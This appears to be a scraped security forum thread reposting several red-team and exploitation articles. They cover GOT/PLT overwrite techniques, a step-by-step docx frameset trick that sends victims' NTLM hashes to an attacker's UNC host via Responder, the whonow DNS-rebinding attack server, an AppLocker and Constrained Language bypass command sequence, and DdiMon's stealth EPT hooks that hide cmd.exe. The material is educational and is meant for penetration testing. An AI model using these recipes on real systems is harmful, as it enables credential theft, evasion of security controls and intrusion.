Strike ExternalC2 help page, https://www.cobaltstrike.com/help-externalc2. Sursa: https://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/
      • 2
      • Upvote
      • Thanks
  13. GOT and PLT for pwning. 19 Mar 2017 in Security Tags: Pwning, Linux So, during the recent 0CTF, one of my teammates was asking me about RELRO and the GOT and the PLT and all of the ELF sections involved. I realized that though I knew the general concepts, I didn’t know as much as I should, so I did some research to find out some more. This is documenting the research (and hoping it’s useful for others). All of the examples below will be on an x86 Linux platform, but the concepts all apply equally to x86-64. (And, I assume, other architectures on Linux, as the concepts are related to ELF linking and glibc, but I haven’t checked.) High-Level Introduction So what is all of this nonsense about? Well, there’s two types of binaries on any system: statically linked and dynamically linked. Statically linked binaries are self-contained, containing all of the code necessary for them to run within the single file, and do not depend on any external libraries. Dynamically linked binaries (which are the default when you run gcc and most other compilers) do not include a lot of functions, but rely on system libraries to provide a portion of the functionality. For example, when your binary uses printf to print some data, the actual implementation of printf is part of the system C library. Typically, on current GNU/Linux systems, this is provided by libc.so.6, which is the name of the current GNU Libc library. In order to locate these functions, your program needs to know the address of printf to call it. While this could be written into the raw binary at compile time, there’s some problems with that strategy: Each time the library changes, the addresses of the functions within the library change, when libc is upgraded, you’d need to rebuild every binary on your system. While this might appeal to Gentoo users, the rest of us would find it an upgrade challenge to replace every binary every time libc received an update. Modern systems using ASLR load libraries at different locations on each program invocation. Hardcoding addresses would render this impossible. Consequently, a strategy was developed to allow looking up all of these addresses when the program was run and providing a mechanism to call these functions from libraries. This is known as relocation, and the hard work of doing this at runtime is performed by the linker, aka ld-linux.so. (Note that every dynamically linked program will be linked against the linker, this is actually set in a special ELF section called .interp.) The linker is actually run before any code from your program or libc, but this is completely abstracted from the user by the Linux kernel. Relocations Looking at an ELF file, you will discover that it has a number of sections, and it turns out that relocations require several of these sections. I’ll start by defining the sections, then discuss how they’re used in practice. .got This is the GOT, or Global Offset Table. This is the actual table of offsets as filled in by the linker for external symbols. .plt This is the PLT, or Procedure Linkage Table. These are stubs that look up the addresses in the .got.plt section, and either jump to the right address, or trigger the code in the linker to look up the address. (If the address has not been filled in to .got.plt yet.) .got.plt This is the GOT for the PLT. It contains the target addresses (after they have been looked up) or an address back in the .plt to trigger the lookup. Classically, this data was part of the .got section. .plt.got It seems like they wanted every combination of PLT and GOT! This just seems to contain code to jump to the first entry of the .got. I’m not actually sure what uses this. (If you know, please reach out and let me know! In testing a couple of programs, this code is not hit, but maybe there’s some obscure case for this.) TL;DR: Those starting with .plt contain stubs to jump to the target, those starting with .got are tables of the target addresses. Let’s walk through the way a relocation is used in a typical binary. We’ll include two libc functions: puts and exit and show the state of the various sections as we go along. Here’s our source: 1 2 3 4 5 6 7 8 9 // Build with: gcc -m32 -no-pie -g -o plt plt.c #include <stdio.h> #include <stdlib.h> int main(int argc, char **argv) { puts("Hello world!"); exit(0); } Let’s examine the section headers: 1 2 3 4 5 6 7 8 9 There are 36 section headers, starting at offset 0x1fb4: Section Headers: [Nr] Name Type Addr Off Size ES Flg Lk Inf Al [12] .plt PROGBITS 080482f0 0002f0 000040 04 AX 0 0 16 [13] .plt.got PROGBITS 08048330 000330 000008 00 AX 0 0 8 [14] .text PROGBITS 08048340 000340 0001a2 00 AX 0 0 16 [23] .got PROGBITS 08049ffc 000ffc 000004 04 WA 0 0 4 [24] .got.plt PROGBITS 0804a000 001000 000018 04 WA 0 0 4 I’ve left only the sections I’ll be talking about, the full program is 36 sections! So let’s walk through this process with the use of GDB. (I’m using the fantastic GDB environment provided by pwndbg, so some UI elements might look a bit different from vanilla GDB.) We’ll load up our binary and set a breakpoint just before puts gets called and then examine the flow step-by-step: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 pwndbg> disass main Dump of assembler code for function main: 0x0804843b <+0>: lea ecx,[esp+0x4] 0x0804843f <+4>: and esp,0xfffffff0 0x08048442 <+7>: push DWORD PTR [ecx-0x4] 0x08048445 <+10>: push ebp 0x08048446 <+11>: mov ebp,esp 0x08048448 <+13>: push ebx 0x08048449 <+14>: push ecx 0x0804844a <+15>: call 0x8048370 <__x86.get_pc_thunk.bx> 0x0804844f <+20>: add ebx,0x1bb1 0x08048455 <+26>: sub esp,0xc 0x08048458 <+29>: lea eax,[ebx-0x1b00] 0x0804845e <+35>: push eax 0x0804845f <+36>: call 0x8048300 <puts@plt> 0x08048464 <+41>: add esp,0x10 0x08048467 <+44>: sub esp,0xc 0x0804846a <+47>: push 0x0 0x0804846c <+49>: call 0x8048310 <exit@plt> End of assembler dump. pwndbg> break *0x0804845f Breakpoint 1 at 0x804845f: file plt.c, line 7. pwndbg> r Breakpoint *0x0804845f pwndbg> x/i $pc => 0x804845f <main+36>: call 0x8048300 <puts@plt> Ok, we’re about to call puts. Note that the address being called is local to our binary, in the .pltsection, hence the special symbol name of puts@plt. Let’s step through the process until we get to the actual puts function. 1 2 3 pwndbg> si pwndbg> x/i $pc => 0x8048300 <puts@plt>: jmp DWORD PTR ds:0x804a00c We’re in the PLT, and we see that we’re performing a jmp, but this is not a typical jmp. This is what a jmp to a function pointer would look like. The processor will dereference the pointer, then jump to resulting address. Let’s check the dereference and follow the jmp. Note that the pointer is in the .got.plt section as we described above. 1 2 3 4 5 6 7 pwndbg> x/wx 0x804a00c 0x804a00c: 0x08048306 pwndbg> si 0x08048306 in puts@plt () pwndbg> x/2i $pc => 0x8048306 <puts@plt+6>: push 0x0 0x804830b <puts@plt+11>: jmp 0x80482f0 Well, that’s weird. We’ve just jumped to the next instruction! Why has this occurred? Well, it turns out that because we haven’t called puts before, we need to trigger the first lookup. It pushes the slot number (0x0) on the stack, then calls the routine to lookup the symbol name. This happens to be the beginning of the .plt section. What does this stub do? Let’s find out. 1 2 3 4 5 pwndbg> si pwndbg> si pwndbg> x/2i $pc => 0x80482f0: push DWORD PTR ds:0x804a004 0x80482f6: jmp DWORD PTR ds:0x804a008 Now, we push the value of the second entry in .got.plt, then jump to the address stored in the third entry. Let’s examine those values and carry on. 1 2 pwndbg> x/2wx 0x804a004 0x804a004: 0xf7ffd918 0xf7fedf40 Wait, where is that pointing? It turns out the first one points into the data segment of ld.so, and the 2nd into the executable area: 1 2 3 0xf7fd9000 0xf7ffb000 r-xp 22000 0 /lib/i386-linux-gnu/ld-2.24.so 0xf7ffc000 0xf7ffd000 r--p 1000 22000 /lib/i386-linux-gnu/ld-2.24.so 0xf7ffd000 0xf7ffe000 rw-p 1000 23000 /lib/i386-linux-gnu/ld-2.24.so Ah, finally, we’re asking for the information for the puts symbol! These two addresses in the .got.plt section are populated by the linker/loader (ld.so) at the time it is loading the binary. So, I’m going to treat what happens in ld.so as a black box. I encourage you to look into it, but exactly how it looks up the symbols is a little bit too low level for this post. Suffice it to say that eventually we will reach a ret from the ld.so code that resolves the symbol. 1 2 3 4 5 pwndbg> x/i $pc => 0xf7fedf5b: ret 0xc pwndbg> ni pwndbg> info symbol $pc puts in section .text of /lib/i386-linux-gnu/libc.so.6 Look at that, we find ourselves at puts, exactly where we’d like to be. Let’s see how our stack looks at this point: 1 2 3 4 pwndbg> x/4wx $esp 0xffffcc2c: 0x08048464 0x08048500 0xffffccf4 0xffffccfc pwndbg> x/s *(int *)($esp+4) 0x8048500: "Hello world!" Absolutely no trace of the trip through .plt, ld.so, or anything but what you’d expect from a direct call to puts. Unfortunately, this seemed like a long trip to get from main to puts. Do we have to go through that every time? Fortunately, no. Let’s look at our entry in .got.plt again, disassembling puts@plt to verify the address first: 1 2 3 4 5 6 7 8 9 10 pwndbg> disass 'puts@plt' Dump of assembler code for function puts@plt: 0x08048300 <+0>: jmp DWORD PTR ds:0x804a00c 0x08048306 <+6>: push 0x0 0x0804830b <+11>: jmp 0x80482f0 End of assembler dump. pwndbg> x/wx 0x804a00c 0x804a00c: 0xf7e4b870 pwndbg> info symbol 0xf7e4b870 puts in section .text of /lib/i386-linux-gnu/libc.so.6 So now, a call puts@plt results in a immediate jmp to the address of puts as loaded from libc. At this point, the overhead of the relocation is one extra jmp. (Ok, and dereferencing the pointer which might cause a cache load, but I suspect the GOT is very often in L1 or at least L2, so very little overhead.) How did the .got.plt get updated? That’s why a pointer to the beginning of the GOT was passed as an argument back to ld.so. ld.so did magic and inserted the proper address in the GOT to replace the previous address which pointed to the next instruction in the PLT. Pwning Relocations Alright, well now that we think we know how this all works, how can I, as a pwner, make use of this? Well, pwning usually involves taking control of the flow of execution of a program. Let’s look at the permissions of the sections we’ve been dealing with: 1 2 3 4 5 6 7 8 9 10 Section Headers: [Nr] Name Type Addr Off Size ES Flg Lk Inf Al [12] .plt PROGBITS 080482f0 0002f0 000040 04 AX 0 0 16 [13] .plt.got PROGBITS 08048330 000330 000008 00 AX 0 0 8 [14] .text PROGBITS 08048340 000340 0001a2 00 AX 0 0 16 [23] .got PROGBITS 08049ffc 000ffc 000004 04 WA 0 0 4 [24] .got.plt PROGBITS 0804a000 001000 000018 04 WA 0 0 4 Key to Flags: W (write), A (alloc), X (execute), M (merge), S (strings), I (info), We’ll note that, as is typical for a system supporting NX, no section has both the Write and eXecute flags enabled. So we won’t be overwriting any executable sections, but we should be used to that. On the other hand, the .got.plt section is basically a giant array of function pointers! Maybe we could overwrite one of these and control execution from there. It turns out this is quite a common technique, as described in a 2001 paper from team teso. (Hey, I never said the technique was new.) Essentially, any memory corruption primitive that will let you write to an arbitrary (attacker-controlled) address will allow you to overwrite a GOT entry. Mitigations So, since this exploit technique has been known for so long, surely someone has done something about it, right? Well, it turns out yes, there’s been a mitigation since 2004. Enter relocations read-only, or RELRO. It in fact has two levels of protection: partial and full RELRO. Partial RELRO (enabled with -Wl,-z,relro): Maps the .got section as read-only (but not .got.plt) Rearranges sections to reduce the likelihood of global variables overflowing into control structures. Full RELRO (enabled with -Wl,-z,relro,-z,now): Does the steps of Partial RELRO, plus: Causes the linker to resolve all symbols at link time (before starting execution) and then remove write permissions from .got. .got.plt is merged into .got with full RELRO, so you won’t see this section name. Only full RELRO protects against overwriting function pointers in .got.plt. It works by causing the linker to immediately look up every symbol in the PLT and update the addresses, then mprotect the page to no longer be writable. Summary The .got.plt is an attractive target for printf format string exploitation and other arbitrary write exploits, especially when your target binary lacks PIE, causing the .got.plt to be loaded at a fixed address. Enabling Full RELRO protects against these attacks by preventing writing to the GOT. References ELF Format Reference Examining Dynamic Linking with GDB RELRO - A (not so well known) Memory Corruption Mitigation Technique What is the symbol and the global offset table? How the ELF ruined Christmas Sursa: https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html
  14. Microsoft Office – NTLM Hashes via Frameset December 18, 2017 Microsoft office documents are playing a vital role towards red team assessments as usually they are used to gain some initial foothold on the client’s internal network. Staying under the radar is a key element as well and this can only be achieved by abusing legitimate functionality of Windows or of a trusted application such as Microsoft office. Historically Microsoft Word was used as an HTML editor. This means that it can support HTML elements such as framesets. It is therefore possible to link a Microsoft Word document with a UNC path and combing this with responder in order to capture NTLM hashes externally. Word documents with the docx extension are actually a zip file which contains various XML documents. These XML files are controlling the theme, the fonts, the settings of the document and the web settings. Using 7-zip it is possible to open that archive in order to examine these files: Docx Contents The word folder contains a file which is called webSettings.xml. This file needs to be modified in order to include the frameset. webSettings File Adding the following code will create a link with another file. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 <w:frameset> <w:framesetSplitbar> <w:w w:val="60"/> <w:color w:val="auto"/> <w:noBorder/> </w:framesetSplitbar> <w:frameset> <w:frame> <w:name w:val="3"/> <w:sourceFileName r:id="rId1"/> <w:linkedToFile/> </w:frame> </w:frameset> </w:frameset> webSettings XML – Frameset The new webSettings.xml file which contains the frameset needs to be added back to the archive so the previous version will be overwritten. webSettings with Frameset – Adding new version to archive A new file (webSettings.xml.rels) must be created in order to contain the relationship ID (rId1) the UNC path and the TargetMode if it is external or internal. 1 2 3 4 5 <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\192.168.1.169\Microsoft_Office_Updates.docx" TargetMode="External"/> </Relationships> webSettings XML Relationship File – Contents The _rels directory contains the associated relationships of the document in terms of fonts, styles, themes, settings etc. Planting the new file in that directory will finalize the relationship link which has been created previously via the frameset. webSettings XML rels Now that the Word document has been weaponized to connect to a UNC path over the Internet responder can be configured in order to capture the NTLM hashes. 1 responder -I wlan0 -e 192.168.1.169 -b -A -v Responder Configuration Once the target user open the word document it will try to connect to a UNC path. Word – Connect to UNC Path via Frameset Responder will retrieve the NTLMv2 hash of the user. Responder – NTLMv2 Hash via Frameset Alternatively Metasploit Framework can be used instead of Responder in order to capture the password hash. 1 auxiliary/server/capture/smb Metasploit – SMB Capture Module NTLMv2 hashes will be captured in Metasploit upon opening the document. Metasploit SMB Capture Module – NTLMv2 Hash via Frameset Conclusion This technique can allow the red team to grab domain password hashes from users which can lead to internal network access if 2-factor authentication for VPN access is not enabled and there is a weak password policy. Additionally if the target user is an elevated account such as local administrator or domain admin then this method can be combined with SMB relay in order to obtain a Meterpreter session. Sursa: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/
      • 1
      • Upvote
  15. Whonow DNS Server A malicious DNS server for executing DNS Rebinding attacks on the fly. whonow lets you specify DNS responses and rebind rules dynamically using domain requests themselves. # respond to DNS queries for this domain with 52.23.194.42 the first time # it is requested and then 192.168.1.1 every time after that A.52.23.194.42.1time.192.168.1.1.forever.rebind.network # respond first with 52.23.194.42, then 192.168.1.1 the next five times, # and then start all over again (1, then 5, forever...) A.52.23.194.42.1time.192.168.1.1.5times.repeat.rebind.network What's great about dynamic DNS Rebinding rules is that you don't have to spin up your own malicious DNS server to start exploiting the browser's Same-origin policy. Instead, everyone can share the same public whonow server. Note: You should include UUIDs (e.g. a06a5856-1fff-4415-9aa2-823230b05826) as a subdomain in each DNS lookup to a whonow server. These have been omitted from examples in this README for brevity, but assume requests to *.rebind.network should be *.a06a5856-1fff-4415-9aa2-823230b05826.rebind.network. See the Gotchas section for more info as to why. Subdomains = Rebind Rules The beauty of whonow is that you can define the behavior of DNS responses via subdomains in the domain name itself. Using only a few simple keywords: A, (n)times, forever, and repeat, you can define complex and powerful DNS behavior. Anatomy of a whonow request A.<ip-address>.<rule>[.<ip-address>.<rule>[.<ip-address>.<rule>]][.uuid/random-string].example.com A: The type of DNS request. Currently only A records are supported, but AAAA should be coming soon. <ip-address>: an ipv4 (ipv6 coming soon) address with each octet seprated by a period (e.g. 192.168.1.1. <rule>: One of three rules (n)time: The number of times the DNS server should reply with the previous IP address. Accepts both plural and singular strings (e.g. 1time, 3times, 5000times) forever: Respond with the previous IP address forever. repeat: Repeat the entire set of rules starting from the beginning. [uuid/random-string]: A random string to keep DNS Rebind attacks against the same IP addresses separate from each other. See Gotchas for more info. example.com: A domain name you have pointing to a whonow nameserver, like the publicly available rebind.networkwhonow instance. Rules can be chained together to form complex response behavior. Examples # always respond with 192.168.1.1. This isn't really DNS rebinding # but it still works A.192.168.1.1.forever.rebind.network # alternate between localhost and 10.0.0.1 forever A.127.0.0.1.1time.10.0.0.1.1time.repeat.rebind.network # first respond with 192.168.1.1 then 192.168.1.2. Now respond 192.168.1.3 forever. A.192.168.1.1.1time.192.168.1.2.2times.192.168.1.3.forever.rebind.network # respond with 52.23.194.42 the first time, then whatever `whonow --default-address` # is set to forever after that (default: 127.0.0.1) A.52.23.194.42.1time.rebind.network Limitations Each label [subdomain] may contain zero to 63 characters... The full domain name may not exceed the length of 253 characters in its textual representation. (from the DNS Wikipedia page) Additionally, there may not be more than 127 labels/subdomains. Gotchas Use Unique Domain Names Each unique domain name request to whonow creates a small state-saving program in the server's RAM. The next time that domain name is requested the program counter increments and the state may be mutated. All unique domain names are their own unique program instances. To avoid clashing with other users or having your domain name program's state inadvertently incremented you should add a UUID subdomain after your rule definitions. That UUID should never be reused. # this A.127.0.0.1.1time.10.0.0.1.1time.repeat.8f058b82-4c39-4dfe-91f7-9b07bcd7fbd4.rebind.network # not this A.127.0.0.1.1time.10.0.0.1.1time.repeat.rebind.network --max-ram-domains The program state associated with each unique domain name is stored by whonow in RAM. To avoid running out of RAM an upper-bound is placed on the number of unique domains who's program state can be managed at the same time. By default, this value is set to 10,000,000, but can be configured with the --max-ram-domains. Once this limit is reached, domain names and their saved program state will be removed in the order they were added (FIFO). Running your own whonow server To run your own whonow server in the cloud use your domain name provider's admin panel to configure a custom nameserver pointing to your VPS. Then install whonow on that VPS and make sure it's running on port 53 (the default DNS port) and that port 53 is accessible to the Internet. # install npm install --cli -g whonow@latest # run it! whonow --port 53 If that ☝ is too much trouble, feel free to just use the public whonow server running on rebind.network ?. Usage $ whonow --help usage: whonow [-h] [-v] [-p PORT] [-d DEFAULT_ANSWER] [-b MAX_RAM_DOMAINS] A malicious DNS server for executing DNS Rebinding attacks on the fly. Optional arguments: -h, --help Show this help message and exit. -v, --version Show program's version number and exit. -p PORT, --port PORT What port to run the DNS server on (default: 53). -d DEFAULT_ANSWER, --default-answer DEFAULT_ANSWER The default IP address to respond with if no rule is found (default: "127.0.0.1"). -b MAX_RAM_DOMAINS, --max-ram-domains MAX_RAM_DOMAINS The number of domain name records to store in RAM at once. Once the number of unique domain names queried surpasses this number domains will be removed from memory in the order they were requested. Domains that have been removed in this way will have their program state reset the next time they are queried (default: 10000000). Testing A whonow server must be running on localhost:15353 to perform the tests in test.js # in one terminal whonow -p 15353 # in another terminal cd path/to/node_modules/whonow npm test Sursa: https://github.com/brannondorsey/whonow
      • 1
      • Upvote
  16. Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts JANUARY 7, 2018 ~ BOHOPS Introduction Last week, I was hunting around the Windows Operating System for interesting scripts and binaries that may be useful for future penetration tests and Red Team engagements. With increased client-side security, awareness, and monitoring (e.g. AppLocker, Device Guard, AMSI, Powershell ScriptBlock Logging, PowerShell Constraint Language Mode, User Mode Code Integrity, HIDS/anti-virus, the SOC, etc.), looking for ways to deceive, evade, and/or bypass security solutions have become a significant component of the ethical hacker’s playbook. While hunting, I came across an interesting directory structure that contained diagnostic scripts located at the following ‘parent’ path: %systemroot%\diagnostics\system\ In particular, two subdirectories (\AERO) and (\Audio) contained two very interesting, signed PowerShell Scripts: CL_Invocation.ps1 CL_LoadAssembly.ps1 CL_Invocation.ps1 provides a function (SyncInvoke) to execute binaries through System.Diagnostics.Process. and CL_LoadAssembly.ps1 provides two functions (LoadAssemblyFromNS and LoadAssemblyFromPath) for loading .NET/C# assemblies (DLLs/EXEs). Analysis of CL_Invocation.ps1 While investigating this script, it was quite apparent that executing commands would be very easy, as demonstrated in the following screenshot: Importing the module and using SyncInvoke is pretty straight forward, and command execution is successfully achieved through: . CL_Invocation.ps1 (or import-module CL_Invocation.ps1) SyncInvoke <command> <arg...> However, further research indicated that this technique did not bypass any protections with subsequent testing efforts. PowerShell Contrained Language Mode (in PSv5) prevented the execution of certain PowerShell code/scripts and Default AppLocker policies prevented the execution of unsigned binaries under the context of an unprivileged account. Still, CL_Invocation.ps1 may have merit within trusted execution chains and evading defender analysis when combined with other techniques. **Big thanks to @Oddvarmoe and @xenosCR for their help and analysis of CL_Invocation Analysis of CL_LoadAssembly.ps1 While investigating CL_LoadAssembly, I found a very interesting write-up (Applocker Bypass-Assembly Load) by @netbiosX that describes research conducted by Casey Smith (@subTee) during a presentation at SchmooCon 2015. He successfully discovered an AppLocker bypass through the use of loading assemblies within PowerShell by URL, file location, and byte code. Additionally, @subTee alluded to a bypass technique with CL_LoadAssembly in a Tweet posted a few years ago: In order to test this method, I compiled a very basic program (assembly) in C# (Target Framework: .NET 2.0) that I called funrun.exe, which runs calc.exe via proc.start() if (successfully) executed: Using a Windows 2016 machine with Default AppLocker rules under an unprivileged user context, the user attempted to execute funrun.exe directly. When called on the cmd line and PowerShell (v5), this was prevented by policy as shown in the following screenshot: Funrun.exe was also prevented by policy when ran under PowerShell version 2: Using CL_LoadAssembly, the user successfully loads the assembly with a path traversal call to funrun.exe. However, Constrained Language mode prevented the user from calling the method in PowerShell (v5) as indicated in the following screenshot: To bypass Constrained Language mode, the user invokes PowerShell v2 and successfully loads the assembly with a path traversal call to funrun.exe: The user calls the funrun assembly method and spawns calc.exe: Success! As an unprivileged user, we proved that we could bypass Constrained Language mode by invoking PowerShell version 2 (Note: this must be enabled) and bypassed AppLocker by loading an assembly through CL_LoadAssembly.ps1. For completeness, here is the CL sequence: powershell -v 2 -ep bypass cd C:\windows\diagnostics\system\AERO import-module .\CL_LoadAssembly.ps1 LoadAssemblyFromPath ..\..\..\..\temp\funrun.exe [funrun.hashtag]::winning() AppLocker Bypass Resources For more information about AppLocker bypass techniques, I highly recommend checking out The Ultimate AppLocker Bypass List created and maintained by Oddvar Moe (@Oddvarmoe). Also, these resources were very helpful while drafting this post: AppLocker Bypass-Assembly Load – https://pentestlab.blog/tag/assembly-load/ C# to Windows Meterpreter in 10 min – https://holdmybeersecurity.com/2016/09/11/c-to-windows-meterpreter-in-10mins/ Conclusion Well folks, that covers interesting code execution and AppLocker bypass vectors to incorporate into your red team/pen test engagements. Please feel free to contact me or leave a message if you have any other questions/comments. Thank you for reading! Sursa: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
  17. Pentester Academy TV Publicat pe 28 mar. 2018 ABONEAZĂ-TE 21 K Today's episode of The Tool Box features NetRipper. We breakdown everything you need to know! Including what it does, who it was developed by, and the best ways to use it! Check out NetRipper here: Github - https://github.com/NytroRST/NetRipper Send your tool to: media@pentesteracademy.com for consideration Thanks for watching and don't forget to subscribe to our channel for the latest cybersecurity news! Visit Hacker Arsenal for the latest attack-defense gadgets! https://www.hackerarsenal.com/ FOLLOW US ON: ~Facebook: http://bit.ly/2uS4pK0 ~Twitter: http://bit.ly/2vd5QSE ~Instagram: http://bit.ly/2v0tnY8 ~LinkedIn: http://bit.ly/2ujkyeC ~Google +: http://bit.ly/2tNFXtc ~Web: http://bit.ly/29dtbcn
      • 4
      • Upvote
      • Like
  18. DdiMon Introduction DdiMon is a hypervisor performing inline hooking that is invisible to a guest (ie, any code other than DdiMon) by using extended page table (EPT). DdiMon is meant to be an educational tool for understanding how to use EPT from a programming perspective for research. To demonstrate it, DdiMon installs the invisible inline hooks on the following device driver interfaces (DDIs) to monitor activities of the Windows built-in kernel patch protection, a.k.a. PatchGuard, and hide certain processes without being detected by PatchGuard. ExQueueWorkItem ExAllocatePoolWithTag ExFreePool ExFreePoolWithTag NtQuerySystemInformation Those stealth shadow hooks are hidden from guest's read and write memory operations and exposed only on execution of the memory. Therefore, they are neither visible nor overwritable from a guest, while they function as ordinal hooks. It is accomplished by making use of EPT enforcing a guest to see different memory contents from what it would see if EPT is not in use. This technique is often called memory shadowing. For more details, see the Design section below. Here is a movie demonstrating that shadow hooks allow you to monitor and control DDI calls without being notified by PatchGuard. https://www.youtube.com/watch?v=UflyX3GeYkw DdiMon is implemented on the top of HyperPlatform. See a project page for more details of HyperPlatform: https://github.com/tandasat/HyperPlatform Installation and Uninstallation Clone full source code from Github with a below command and compile it on Visual Studio. $ git clone --recursive https://github.com/tandasat/DdiMon.git On the x64 platform, you have to enable test signing to install the driver. To do that, open the command prompt with the administrator privilege and type the following command, and then restart the system to activate the change: >bcdedit /set testsigning on To install and uninstall the driver, use the 'sc' command. For installation: >sc create DdiMon type= kernel binPath= C:\Users\user\Desktop\DdiMon.sys >sc start DdiMon And for uninstallation: >sc stop DdiMon >sc delete DdiMon >bcdedit /deletevalue testsigning Note that the system must support the Intel VT-x and EPT technology to successfully install the driver. To install the driver on a virtual machine on VMware Workstation, see an "Using VMware Workstation" section in the HyperPlatform User Document. http://tandasat.github.io/HyperPlatform/userdocument/ Output All logs are printed out to DbgView and saved in C:\Windows\DdiMon.log. Motivation Despite existence of plenty of academic research projects[1,2,3] and production software[4,5], EPT (a.k.a. SLAT; second-level-address translation) is still underused technology among reverse engineers due to lack of information on how it works and how to control it through programming. MoRE[6] by Jacob Torrey is a one of very few open source projects demonstrating use of EPT with small amount of code. While we recommend to look into the project for basic comprehension of how EPT can be initialized and used to set up more than 1:1 guest to machine physical memory mapping, MoRE lacks flexibility to extend its code for supporting broader platforms and implementing your own analysis tools. DdiMon provides a similar sample use of EPT as what MoRE does with a greater range of platform support such as x64 and/or Windows 10. DdiMon, also, can be seen as example extension of HyperPlatform for memory virtualization. [1] SecVisor: A Tiny Hypervisor to Provide Lifetime Kernel Code Integrity for Commodity OSes - https://www.cs.cmu.edu/~arvinds/pubs/secvisor.pdf [2] SPIDER: Stealthy Binary Program Instrumentation and Debugging via Hardware Virtualization - https://www.cerias.purdue.edu/assets/pdf/bibtex_archive/2013-5.pdf [3] Dynamic VM Dependability Monitoring Using Hypervisor Probes - http://assured-cloud-computing.illinois.edu/files/2014/03/Dynamic-VM-Dependability-Monitoring-Using-Hypervisor-Probes.pdf [4] Windows 10 Virtualization-based Security (Device Guard) - https://technet.microsoft.com/en-us/library/mt463091(v=vs.85).aspx [5] VMRay - https://www.vmray.com/features/ [6] MoRE - https://github.com/ainfosec/MoRE Design In order to install a shadow hook, DdiMon creates a couple of copies of a page where the address to install a hook belongs to. After DdiMon is initialized, those two pages are accessed when a guest, namely all but ones by the hypervisor (ie, DdiMon), attempts to access to the original page instead. For example, when DdiMon installs a hook onto 0x1234, two copied pages are created: 0xa000 for execution access and 0xb000 for read or write access, and memory access is performed as below after the hook is activated: Requested Accessed By Hypervisor: 0x1234 -> 0x1234 on all access By Guest: 0x1234 -> 0xa234 on execution access -> 0xb234 on read or write access The following explains how it is accomplished. Default state DdiMon first configures an EPT entry corresponds to 0x1000-0x1fff to refer to the contents of 0xa000 and to disallow read and write access to the page. Scenario: Read or Write With this configuration, any read and write access triggers EPT violation VM-exit. Up on the VM-exit, the EPT entry for 0x1000-0x1fff is modified to refer to the contents of 0xb000, which is copy of 0x1000, and to allow read and write to the page. And then, sets the Monitor Trap Flag (MTF), which works like the Trap Flag of the flag register but not visible to a guest, so that a guest can perform the read or write operation and then interrupted by the hypervisor with MTF VM-exit. After executing a single instruction, a guest is interrupted by MTF VM-exit. On this VM-exit, the hypervisor clears the MTF and resets the EPT entry to the default state so that subsequent execution is done with the contents of 0xa000. As a result of this sequence of operations, a guest executed a single instruction reading from or writing to 0xb234. Scenario: Execute At this time, execution is done against contents of 0xa000 without triggering any events unless no other settings is made. In order to monitor execution of 0xa234 (0x1234 from guest's perspective), DdiMon sets a break point (0xcc) to 0xa234 and handles #BP in the hypervisor. Following steps are how DdiMon hooks execution of 0xa234. On #BP VM-exit, the hypervisor checks if guest's EIP/RIP is 0x1234 first. If so, the hypervisor changes the contents of the register to point to a corresponding hook handler for instrumenting the DDI call. On VM-enter, a guest executes the hook handler. The hook handler calls an original function, examines parameters, return values and/or a return address, and takes action accordingly. This is just like a typical inline hooking. Only differences are that it sets 0xcc and changes EIP/RIP from a hypervisor instead of overwriting original code with JMP instructions and that installed hooks are not visible from a guest. An advantage of using 0xcc is that it does not require a target function to have a length to install JMP instructions. Implementation The following are a call hierarchy with regard to sequences explained above. On DriverEntry DdimonInitialization() DdimonpEnumExportedSymbolsCallback() // Enumerates exports of ntoskrnl ShInstallHook() // Installs a stealth hook ShEnableHooks() // Activates installed hooks ShEnablePageShadowing() ShpEnablePageShadowingForExec() // Configures an EPT entry as // explained in "Default state" On EPT violation VM-exit with read or write VmmpHandleEptViolation() EptHandleEptViolation() ShHandleEptViolation() // Performs actions as explained in the 1 of // "Scenario: Read or Write" On MTF VM-exit VmmpHandleMonitorTrap() ShHandleMonitorTrapFlag() // Performs actions as explained in the 2 of // "Scenario: Read or Write" On #BP VM-exit VmmpHandleException() ShHandleBreakpoint() // Performs actions as explained in the 1 of // "Scenario: Execute" Implemented Hook Handlers ExQueueWorkItem - The hook handler prints out given parameters when a specified work item routine is not inside any images. ExAllocatePoolWithTag - The hook handler prints out given parameters and a return value of ExAllocatePoolWithTag() when it is called from an address where is not backed by any images. ExFreePool and ExFreePoolWithTag - The hook handlers print out given parameters when they are called from addresses where are not backed by any images. NtQuerySystemInformation - The hook handler takes out an entry for "cmd.exe" from returned process information so that cmd.exe is not listed by process enumeration. The easiest way to see those logs is installing NoImage.sys. https://github.com/tandasat/MemoryMon/tree/master/MemoryMonTest Logs for activities of NoImage are look like this: 17:59:23.014 INF #0 4 48 System 84660265: ExFreePoolWithTag(P= 84665000, Tag= nigm) 17:59:23.014 INF #0 4 48 System 84660283: ExAllocatePoolWithTag(POOL_TYPE= 00000000, NumberOfBytes= 00001000, Tag= nigm) => 8517B000 17:59:23.014 INF #0 4 48 System 8517B1C3: ExQueueWorkItem({Routine= 8517B1D4, Parameter= 8517B000}, 1) Caveats DdiMon is meant to be an educational tool and not robust, production quality software which is able to handle various edge cases. For example, DdiMon does not handle self-modification code since any memory writes on a shadowed page is not reflected to a view for execution. For this reason, researchers are encouraged to use this project as sample code to get familiar with EPT and develop their own tools as needed. Supported Platforms x86 and x64 Windows 7, 8.1 and 10 The system must support the Intel VT-x and EPT technology License This software is released under the MIT License, see LICENSE. Sursa: https://github.com/tandasat/DdiMon
